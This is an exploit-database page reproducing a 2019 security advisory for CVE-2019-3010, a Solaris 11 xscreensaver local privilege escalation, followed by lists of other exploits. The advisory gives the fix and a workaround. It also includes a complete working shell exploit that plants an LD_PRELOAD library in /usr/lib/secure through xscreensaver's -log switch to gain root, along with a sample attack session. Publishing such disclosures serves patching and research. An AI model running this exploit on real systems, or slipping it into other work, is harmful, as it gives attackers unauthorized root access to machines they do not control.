Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Solaris 11.4 - xscreensaver Privilege Escalation"

Author

Exploit author

"Marco Ivaldi"

Platform

Exploit platform

solaris

Release date

Exploit published date

2019-10-21

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16)

         Title:  Local privilege escalation on Solaris 11.x via xscreensaver
   Application:  Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4
    Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3
    Other versions starting from 5.06 are potentially affected
     Platforms:  Oracle Solaris 11.x (tested on 11.4 and 11.3)
    Other platforms are potentially affected (see below)
   Description:  A local attacker can gain root privileges by exploiting a
    design error vulnerability in the xscreensaver distributed with
    Solaris
        Author:  Marco Ivaldi <marco.ivaldi@mediaservice.net>
 Vendor Status:  <secalert_us@oracle.com> notified on 2019-07-09
      CVE Name:  CVE-2019-3010
   CVSS Vector:  CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
    References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt
    https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
    https://www.jwz.org/xscreensaver/
    https://www.oracle.com/technetwork/server-storage/solaris11/
    https://www.mediaservice.net/
    https://0xdeadbeef.info/

1. Abstract.

Exploitation of a design error vulnerability in xscreensaver, as distributed
with Solaris 11.x, allows local attackers to create (or append to) arbitrary
files on the system, by abusing the -log command line switch introduced in
version 5.06. This flaw can be leveraged to cause a denial of service condition
or to escalate privileges to root.

2. Example Attack Session.

raptor@stalker:~$ cat /etc/release
                             Oracle Solaris 11.4 X86
  Copyright (c) 1983, 2018, Oracle and/or its affiliates.  All rights reserved.
                            Assembled 16 August 2018
raptor@stalker:~$ uname -a
SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
raptor@stalker:~$ id
uid=100(raptor) gid=10(staff)
raptor@stalker:~$ chmod +x raptor_xscreensaver
raptor@stalker:~$ ./raptor_xscreensaver
raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
[...]
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
root@stalker:~# id
uid=0(root) gid=0(root)

3. Affected Platforms.

This vulnerability was confirmed on the following platforms:

* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation]
* Oracle Solaris 11.x SPARC [untested]

Previous Oracle Solaris 11 versions might also be vulnerable.

Based on our analysis and on feedback kindly provided by Alan Coopersmith of
Oracle, we concluded that this is a Solaris-specific vulnerability, caused by
the fact that Oracle maintains a slightly different codebase from the upstream
one. Alan explained this as follows:

"The problem in question here appears to be inherited from the long-ago fork
[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based
unlock dialog with accessibility support to replace the non-accessible Xlib
unlock dialog that upstream provides, which moves the uid reset to after where
the log file opening was later added."

Specifically, the problem arises because of this bit of Solaris patches:
https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770

As an interesting side note, it appears Red Hat dropped this code back in 2002
with version 4.05-5:
https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179

4. Fix.

Oracle has assigned the tracking# S1182608 and has released a fix for all
affected and supported versions of Solaris in their Critical Patch Update (CPU)
of October 2019.

As a temporary workaround, it is also possible to remove the setuid bit from
the xscreensaver executable as follows (note that this might prevent it from
working properly):

bash-3.2# chmod -s /usr/bin/xscreensaver

5. Proof of Concept.

An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It
can be downloaded from:

https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver

#!/bin/sh

#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi <[email protected]>
#
# Exploitation of a design error vulnerability in xscreensaver, as 
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# [email protected]:~$ chmod +x raptor_xscreensaver
# [email protected]:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
# [email protected]:~# id
# uid=0(root) gid=0(root)
# [email protected]:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi <[email protected]>"
echo

# prepare the payload
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-04-21 "Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation" local solaris "Marco Ivaldi"
2020-02-11 "OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution" remote freebsd "Marco Ivaldi"
2020-01-16 "SunOS 5.10 Generic_147148-26 - Local Privilege Escalation" local multiple "Marco Ivaldi"
2019-10-21 "Solaris 11.4 - xscreensaver Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-16 "Solaris xscreensaver 11.4 - Privilege Escalation" local solaris "Marco Ivaldi"
2019-06-17 "Exim 4.87 - 4.91 - Local Privilege Escalation" local linux "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2019-01-14 "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)" local solaris "Marco Ivaldi"
2018-11-30 "xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation" local openbsd "Marco Ivaldi"
2018-10-30 "xorg-x11-server 1.20.3 - Privilege Escalation" local openbsd "Marco Ivaldi"
2009-09-11 "IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug" local aix "Marco Ivaldi"
2008-03-10 "Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak" local solaris "Marco Ivaldi"
2007-04-04 "TrueCrypt 4.3 - 'setuid' Local Privilege Escalation" local windows "Marco Ivaldi"
2007-02-13 "Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack" remote multiple "Marco Ivaldi"
2007-02-13 "Lotus Domino R6 Webmail - Remote Password Hash Dumper" remote windows "Marco Ivaldi"
2007-02-06 "MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution" remote windows "Marco Ivaldi"
2006-12-19 "Oracle 9i/10g - 'extproc' Local/Remote Command Execution" remote multiple "Marco Ivaldi"
2006-12-19 "Oracle 9i/10g - 'utl_file' FileSystem Access" remote linux "Marco Ivaldi"
2006-11-23 "Oracle 9i/10g - 'read/write/execute' ation Suite" remote multiple "Marco Ivaldi"
2006-10-24 "Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)" local solaris "Marco Ivaldi"
2006-10-24 "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2006-10-16 "Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)" local solaris "Marco Ivaldi"
2006-10-13 "Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)" local solaris "Marco Ivaldi"
2006-10-13 "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2006-09-13 "X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)" local solaris "Marco Ivaldi"
2006-08-22 "Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)" local solaris "Marco Ivaldi"
2006-08-22 "Solaris 8/9 - '/usr/ucb/ps' Local Information Leak" local solaris "Marco Ivaldi"
2006-07-18 "Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation" local linux "Marco Ivaldi"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47529/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.